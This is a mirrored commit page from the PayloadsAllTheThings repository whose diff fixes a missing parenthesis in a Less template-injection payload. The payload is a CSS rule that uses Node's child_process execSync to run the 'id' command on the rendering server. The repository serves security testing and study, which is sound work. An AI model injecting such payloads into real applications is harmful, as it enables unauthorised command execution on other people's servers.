mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2025-12-30 14:40:28 -08:00
Update README.md
Fixes a typo
This commit is contained in:
@@ -569,7 +569,7 @@ Fixed by https://github.com/HubSpot/jinjava/pull/230
|
||||
|
||||
```less
|
||||
body {
|
||||
color: `global.process.mainModule.require("child_process").execSync("id"`;
|
||||
color: `global.process.mainModule.require("child_process").execSync("id")`;
|
||||
}
|
||||
```
|
||||
|
||||
|
||||
Reference in New Issue
Block a user